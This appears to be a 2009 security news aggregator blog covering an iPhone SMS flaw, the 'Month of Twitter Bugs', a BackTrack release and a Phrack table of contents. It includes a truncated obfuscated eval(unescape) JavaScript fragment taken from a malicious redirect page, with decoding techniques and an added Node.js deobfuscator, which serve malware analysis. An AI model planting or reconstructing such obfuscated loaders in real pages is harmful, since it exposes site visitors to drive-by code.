from V3.co.uk - formerly vnunet.com

Security experts are warning of a serious vulnerability in the iPhone that could allow hackers to remotely execute code on the device.

Security researcher Charlie Miller announced the findings at the SyScan conference in Singapore yesterday. He is now reportedly working with Apple to get the problem fixed as soon as possible.

Patrick Runald, chief security advisor at Finnish web security firm F-Secure, argued on the firm’s blog that the vulnerability, which exploits a weakness in the way the device deals with text messages, is “as bad as it gets”.

“The vulnerability seems to allow unsigned code to run, which circumvents a core part of iPhone’s security model,” he wrote. “It’s usually only able to run signed code, i.e. apps that have been approved by Apple. No user interaction is required, which is unlike current mobile malware.”

The vulnerability could enable hackers to remotely turn on the GPS function to monitor the handset’s location, or turn the microphone on to listen in on conversations, Miller is reported as saying.

Apple will be hoping it finds a fix for the vulnerability before Miller discusses the flaw in greater detail at a planned Black Hat presentation.

It has been a bad week for the iPhone. Supplies have been running out in parts of the US, and the blogosphere has been awash with claims that the new 3GS model is prone to overheating.

I hereby declare that WED JULY 1st is Twitter Security Day (#twittersec). I do so with good reason. As it stands, the guys at http://twitpwn.com/ have declared July the “Month of Twitter Bugs” (MoTB). Taken from their site:

Today, three years after the “Month of Browser Bugs”, I’ve decided to declare July 2009 as “Month of Twitter Bugs” (MoTB). I’m doing so in order to raise the awareness of the Twitter API issue I recently blogged about. MoTB could have been easily converted to any other “Month of Web2.0 service bugs”, and I hope that Twitter and other Web2.0 API providers will work closely with their API consumers to develop more secure products.
Each day I will publish a new vulnerability in a 3rd party Twitter service on the twitpwn.com web site. As those vulnerabilities can be exploited to create a Twitter worm, I’m going to give the 3rd party service provider and Twitter at least 24 hours heads-up before I publish the vulnerability.
Even though I have enough vulnerabilities for this month, you are more than welcome to send me (via email or twitter) vulnerabilities you find in 3rd party Twitter services. I will do my best to publish all submitted vulnerabilities. I will, of course, credit the submitter.

So what does #twittersec mean? What should you do?

Simple: On Wed, July 1st CHANGE YOUR TWITTER PASSWORD.

How many times have you given your Twitter password to a third party site? Did you change your password after you did that? Well, if not, here is a good time to do so. Yes, it is true that changing your password doesn’t invalidate all of the “MoTB”; however, it could help stop a few. And really, it is probably time that you do it anyways, don’t you think?

Even more importantly #twittersec’s goal is to raise awareness to the “MoTB” and to put pressure on the developers to fix the vulnerabilities in these third party apps.

Please help spread the word about Month of Twitter Bugs and #twittersec day!

from Core Security Technologies

Register below for this free webcast on Tuesday, June 30, 2009 at 2pm EDT / 11am PDT GMT -4:00, New York. Upon registering, you’ll receive an email confirmation containing teleconference and login information. A recording of the webcast will be sent to everyone who registers, so be sure to sign up even if you can’t make the live session.

About this webcast:
The most effective web application pen testers expose the risks that vulnerabilities pose to the business, rather than just to the application itself. “The Art of Combining Web Pen Testing Techniques” series explores the art of replicating web attacks that take advantage of multiple vulnerabilities, revealing greater business risks than would be possible by simply analyzing vulnerabilities on an individual basis.

In this first webcast of the trilogy, Kevin Johnson and Ed Skoudis will discuss SQL and content injection. We will look at a number of powerful tools to assist in discovering these flaws, in addition to making exploitation simpler.

The webcast will also outline and run through a real-world scenario that demonstrates how these tools and attacks can be used directly in a penetration test. The scenario will illustrate the use of SQL injection to insert content on a website that will, in turn, give the tester full control of the selected in-scope browsers and systems that access the target site.

Microsoft Security Essentials Beta Home
If you are running Windows (XP, Vista, Windows 7 32/64-bit) then you can now download Microsoft’s “Microsoft Security Essentials” for free. Limited downloads, so get in on it now if you are interested.

via iPod and iPhone Firmware Download.

For those of you who don’t want to pay for the $9.99 update to your iPod Touch, you can download the firmware from here.

Simply select your model of iPod, and download the firmware image. After downloading the desired firmware, you can shift-click (PC) or option-click (Mac) the Restore or Update buttons in iTunes. A file dialog will open and let you choose the downloaded ipsw-file.

The Remote Exploit Team is ecstatic to announce the public release of BackTrack 4 Pre Final codename “pwnsauce”. A VMWare Image of BT4 will be released in a few days. We have major changes in BackTrack, and have tried to document and summarize them as best as possible.

Check out our BackTrack Videos and Resources, our BackTrack PDF, and our “Introduction to BackTrack 4” movie.

We’ve opened up new subforums for this release. Please report bugs and suggestions

As usual, we ask that you do not link directly to our mirrored ISOs. We are trying to get a rough download count for BT4pf.

If you would like to link to our iso, please use :

http://www.remote-exploit.org/cgi-bin/fileget?version=bt4-prefinal-iso

md5sum and sha256sum can be found here, here and here. The Remote Exploit Website News page will be soon updated.

Enjoy

Remote Exploit Team

via Offensive Security – Information Security Blog » BackTrack Pre Final – Public Release and Download.

Also known as “eval( unescape” decryption

Recently, @surbo was working an investigation where he came across some obfuscated code which was innocuously included in an otherwise un-threatening HTML file. He had noticed that the result of the code was to push the client to a .js file which was being hosted on a .cn domain (that can’t be good).

However, when viewing the source of the HTML page, he was presented with a fairly common technique often called “Encrypting HTML”, which really should be considered “Obfuscating HTML” because all that the programmer has done is convert “human-readable” code into “human-unreadable, yet browser-readable” code. Below is a small extract of this obfuscated code.

<script>eval( unescape( "%6"+"9%6"+"6"+"%28%21%6"+"d%79%6"+"9%6"+"b%29%7b%0d%0a%76"+"%6"+"1%72%20%72%3d%6"+"4%6"+"f%6"+"3%75%6"+"d%6"+"5%6"+"e%74%2e%72%6"+"5%6"+"6"+"%6"+"5%72%72%6"+"5%72%2c%75%3d));

He needed to come up with a way to easily de-obfuscate this, and came up with something I feel is very clever: re-write eval into alert and save it to a local file.

Re-Written:
<script>alert( unescape( "%6"+"9%6"+"6"+"%28%21%6"+"d%79%6"+"9%6"+"b%29%7b%0d%0a%76"+"%6"+"1%72%20%72%3d%6"+"4%6"+"f%6"+"3%75%6"+"d%6"+"5%6"+"e%74%2e%72%6"+"5%6"+"6"+"%6"+"5%72%72%6"+"5%72%2c%75%3d));

When loaded into a browser, the BROWSER translates the obfuscated code into human-readable form and gives it to you in a nice alert box, allowing you to copy and paste!

Well, this is an easy way to do it by hand if you are ever in a pinch. But if you are using Firefox, I suggest you check out JavaScript Deobfuscator.
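The same decoding can be done without loading the sample into a browser at all. The Node.js sketch below is an added example, not code from the original post or from @surbo: it treats the page as text, joins the string literals passed to unescape() and percent-decodes them. The function names are hypothetical, and SAMPLE is the truncated extract quoted above.

```javascript
// Static decoder for the eval(unescape("..."+"...")) pattern. The sample is
// handled as text only; nothing taken from it is ever evaluated.
// SAMPLE: the truncated extract quoted in the post (its last literal is unterminated).
const SAMPLE = '<script>eval( unescape( "%6"+"9%6"+"6"+"%28%21%6"+"d%79%6"+"9%6"+"b%29%7b%0d%0a%76"+"%6"+"1%72%20%72%3d%6"+"4%6"+"f%6"+"3%75%6"+"d%6"+"5%6"+"e%74%2e%72%6"+"5%6"+"6"+"%6"+"5%72%72%6"+"5%72%2c%75%3d));';

// Same semantics as unescape(): %XX and %uXXXX become single code units.
function percentDecode(s) {
  return s.replace(/%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})/g,
    (_, u, b) => String.fromCharCode(parseInt(u || b, 16)));
}

// Collect the quoted literals joined by "+" after "unescape(".
// Limitation (assumption): literals contain no backslash-escaped quotes.
function extractLiterals(src) {
  const start = src.search(/unescape\s*\(/);
  if (start < 0) return null;
  let i = src.indexOf('(', start) + 1;
  const parts = [];
  let truncated = false;
  const skipSpace = () => { while (/\s/.test(src[i] || '')) i++; };
  for (;;) {
    skipSpace();
    const quote = src[i];
    if (quote !== '"' && quote !== "'") break;
    const end = src.indexOf(quote, i + 1);
    if (end < 0) { // cut-off extract: keep the tail, drop trailing ");"
      parts.push(src.slice(i + 1).replace(/[\s);]+$/, ''));
      truncated = true;
      break;
    }
    parts.push(src.slice(i + 1, end));
    i = end + 1;
    skipSpace();
    if (src[i] !== '+') break;
    i++;
  }
  return parts.length ? { joined: parts.join(''), truncated } : null;
}

// Peel nested eval(unescape(...)) layers, bounded so hostile input cannot loop forever.
function deobfuscate(src, maxLayers = 5) {
  let code = src, layers = 0, truncated = false;
  while (layers < maxLayers) {
    const lit = extractLiterals(code);
    if (!lit) break;
    code = percentDecode(lit.joined);
    truncated = truncated || lit.truncated;
    layers++;
  }
  return { code, layers, truncated };
}
console.log(JSON.stringify(deobfuscate(SAMPLE)));
```

The `truncated` flag reports that the final literal had no closing quote, as in the extract above, so the decoded text is only the beginning of the script.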

via Network World.

A beta version of Microsoft's free antivirus software - codenamed Morro - will soon be available from the company's website, according to a report.

Reuters says Microsoft employees are already testing the software ahead of a broader rollout in the near future. The company declined to provide a specific date for Morro's release, but said the trial version would be available “soon”.


Microsoft announced its plan to replace its Windows Live OneCare security software with a free antivirus product last November.

The company said at the time that Morro would help encourage more people to take antivirus seriously, claiming nearly 50 percent of Windows users don't have an antivirus tool installed on their PC.

.:: Phrack Magazine ::..

0x01 Introduction
0x02 Phrack Prophile on The PaX Team
0x03 Phrack World News
0x04 Abusing the Objective C runtime
0x05 Backdooring Juniper Firewalls
0x06 Exploiting DLmalloc frees in 2009
0x07 Persistent BIOS infection
0x08 Exploiting UMA : FreeBSD kernel heap exploits
0x09 Exploiting TCP Persist Timer Infiniteness
0x0A Malloc Des-Maleficarum
0x0B A Real SMM Rootkit
0x0C Alphanumeric RISC ARM Shellcode
0x0D Power cell buffer overflow
0x0E Binary Mangling with Radare
0x0F Linux Kernel Heap Tampering Detection
0x10 Developing MacOSX Rootkits
0x11 How close are they of hacking your brain ?

via MacBook Pro 13″ Unibody Teardown.

We got our hands on a MacBook Pro 13″ Unibody and decided to compare it to a MacBook Unibody — from the inside! Follow us on twitter to get all the latest updates as we're doing the teardown!
